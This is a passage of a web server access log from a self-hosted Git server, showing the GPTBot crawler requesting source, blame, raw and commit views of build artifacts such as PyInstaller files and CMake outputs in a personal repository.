"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21840] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24020] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16397] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9941] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10173] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39738] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14302] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:14:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23283] [Gzip 11.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 10869] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 10868] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10341] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:14:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:14:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23253] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16158] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:14:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:14:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:14:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 2814871] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:14:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:14:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:14:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10920] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10919] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10918] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10918] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:14:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr 